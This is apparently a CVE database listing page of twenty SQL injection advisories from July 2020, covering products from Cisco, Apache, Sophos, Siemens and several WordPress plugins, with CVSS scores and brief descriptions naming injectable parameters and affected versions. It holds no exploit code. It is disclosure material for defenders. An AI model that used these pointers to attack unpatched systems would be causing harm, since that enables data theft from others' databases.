Total
9311 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2020-3450 | 1 Cisco | 1 Vision Dynamic Signage Director | 2020-07-22 | 4.0 MEDIUM | 4.9 MEDIUM |
| A vulnerability in the web-based management interface of Cisco Vision Dynamic Signage Director could allow an authenticated, remote attacker with administrative credentials to conduct SQL injection attacks on an affected system. The vulnerability is due to improper validation of user-submitted parameters. An attacker could exploit this vulnerability by authenticating to the web-based management interface and sending malicious requests to an affected system. A successful exploit could allow the attacker to obtain data that is stored in the underlying database, including hashed user credentials. To exploit this vulnerability, an attacker would need valid administrative credentials. | |||||
| CVE-2020-14982 | 1 Kronos | 1 Web Time And Attendance | 2020-07-22 | 4.0 MEDIUM | 6.5 MEDIUM |
| A Blind SQL Injection vulnerability in Kronos WebTA 3.8.x and later before 4.0 (affecting the com.threeis.webta.H352premPayRequest servlet's SortBy parameter) allows an attacker with the Employee, Supervisor, or Timekeeper role to read sensitive data from the database. | |||||
| CVE-2020-15052 | 1 Articatech | 1 Artica Proxy | 2020-07-22 | 5.0 MEDIUM | 7.5 HIGH |
| An issue was discovered in Artica Proxy CE before 4.28.030.418. SQL Injection exists via the Netmask, Hostname, and Alias fields. | |||||
| CVE-2020-15108 | 1 Glpi-project | 1 Glpi | 2020-07-22 | 4.0 MEDIUM | 7.1 HIGH |
| In glpi before 9.5.1, there is a SQL injection for all usages of "Clone" feature. This has been fixed in 9.5.1. | |||||
| CVE-2020-14497 | 1 Advantech | 1 Iview | 2020-07-21 | 7.5 HIGH | 9.8 CRITICAL |
| Advantech iView, versions 5.6 and prior, contains multiple SQL injection vulnerabilities that are vulnerable to the use of an attacker-controlled string in the construction of SQL queries. An attacker could extract user credentials, read or modify information, and remotely execute code. | |||||
| CVE-2020-5768 | 1 Icegram | 1 Email Subscribers \& Newsletters | 2020-07-21 | 4.0 MEDIUM | 4.9 MEDIUM |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in Icegram Email Subscribers & Newsletters Plugin for WordPress v4.4.8 allows a remote, authenticated attacker to determine the value of database fields. | |||||
| CVE-2020-13926 | 1 Apache | 1 Kylin | 2020-07-21 | 7.5 HIGH | 9.8 CRITICAL |
| Kylin concatenates and executes a Hive SQL in Hive CLI or beeline when building a new segment; some part of the HQL is from system configurations, while the configuration can be overwritten by certain rest api, which makes SQL injection attack is possible. Users of all previous versions after 2.0 should upgrade to 3.1.0. | |||||
| CVE-2020-5766 | 1 Srs Simple Hits Counter Project | 1 Srs Simple Hits Counter | 2020-07-20 | 5.0 MEDIUM | 7.5 HIGH |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in SRS Simple Hits Counter Plugin for WordPress 1.0.3 and 1.0.4 allows a remote, unauthenticated attacker to determine the value of database fields. | |||||
| CVE-2020-7577 | 1 Siemens | 1 Opcenter Execution Core | 2020-07-17 | 5.5 MEDIUM | 8.1 HIGH |
| A vulnerability has been identified in Camstar Enterprise Platform (All versions), Opcenter Execution Core (All versions < V8.2). Through the use of several vulnerable fields of the application, an authenticated user could perform an SQL Injection attack by passing a modified SQL query downstream to the back-end server. The exploit of this vulnerability could be used to read, and potentially modify application data to which the user has access to. | |||||
| CVE-2020-11437 | 1 Librehealth | 1 Librehealth Ehr | 2020-07-17 | 4.0 MEDIUM | 4.3 MEDIUM |
| LibreHealth EMR v2.0.0 is affected by SQL injection allowing low-privilege authenticated users to enumerate the database. | |||||
| CVE-2020-15008 | 1 Connectwise | 1 Connectwise Automate | 2020-07-16 | 6.0 MEDIUM | 7.5 HIGH |
| A SQLi exists in the probe code of all Connectwise Automate versions before 2020.7 or 2019.12. A SQL Injection in the probe implementation to save data to a custom table exists due to inadequate server side validation. As the code creates dynamic SQL for the insert statement and utilizes the user supplied table name with little validation, the table name can be modified to allow arbitrary update commands to be run. Usage of other SQL injection techniques such as timing attacks, it is possible to perform full data extraction as well. Patched in 2020.7 and in a hotfix for 2019.12. | |||||
| CVE-2020-3973 | 2 Linux, Vmware | 2 Linux Kernel, Velocloud Orchestrator | 2020-07-15 | 6.5 MEDIUM | 8.8 HIGH |
| The VeloCloud Orchestrator does not apply correct input validation which allows for blind SQL-injection. A malicious actor with tenant access to Velocloud Orchestrator could enter specially crafted SQL queries and obtain data to which they are not privileged. | |||||
| CVE-2020-15504 | 1 Sophos | 1 Xg Firewall Firmware | 2020-07-14 | 7.5 HIGH | 9.8 CRITICAL |
| A SQL injection vulnerability in the user and admin web interfaces of Sophos XG Firewall v18.0 MR1 and older potentially allows an attacker to run arbitrary code remotely. The fix is built into the re-release of XG Firewall v18 MR-1 (named MR-1-Build396) and the v17.5 MR13 release. All other versions >= 17.0 have received a hotfix. | |||||
| CVE-2020-13993 | 1 Mods-for-hesk | 1 Mods For Hesk | 2020-07-14 | 5.0 MEDIUM | 7.5 HIGH |
| An issue was discovered in Mods for HESK 3.1.0 through 2019.1.0. A blind time-based SQL injection issue allows remote unauthenticated attackers to retrieve information from the database via a ticket. | |||||
| CVE-2020-15539 | 1 We-com | 1 Municipality Portal Cms | 2020-07-13 | 7.5 HIGH | 9.8 CRITICAL |
| SQL injection can occur in We-com Municipality portal CMS 2.1.x via the cerca/ keywords field. | |||||
| CVE-2020-9483 | 1 Apache | 1 Skywalking | 2020-07-10 | 5.0 MEDIUM | 7.5 HIGH |
| **Resolved** When use H2/MySQL/TiDB as Apache SkyWalking storage, the metadata query through GraphQL protocol, there is a SQL injection vulnerability, which allows to access unpexcted data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters. | |||||
| CVE-2020-15072 | 1 Phplist | 1 Phplist | 2020-07-10 | 6.5 MEDIUM | 8.8 HIGH |
| An issue was discovered in phpList through 3.5.4. An error-based SQL Injection vulnerability exists via the Import Administrators section. | |||||
| CVE-2020-8520 | 1 Phpzag | 1 Phpzag | 2020-07-09 | 7.5 HIGH | 9.8 CRITICAL |
| SQL injection in order and column parameters in Records.php for phpzag live add edit delete data tables records with ajax php mysql | |||||
| CVE-2020-8519 | 1 Phpzag | 1 Phpzag | 2020-07-09 | 7.5 HIGH | 9.8 CRITICAL |
| SQL injection with the search parameter in Records.php for phpzag live add edit delete data tables records with ajax php mysql | |||||
| CVE-2020-8521 | 1 Phpzag | 1 Phpzag | 2020-07-09 | 7.5 HIGH | 9.8 CRITICAL |
| SQL injection with start and length parameters in Records.php for phpzag live add edit delete data tables records with ajax php mysql | |||||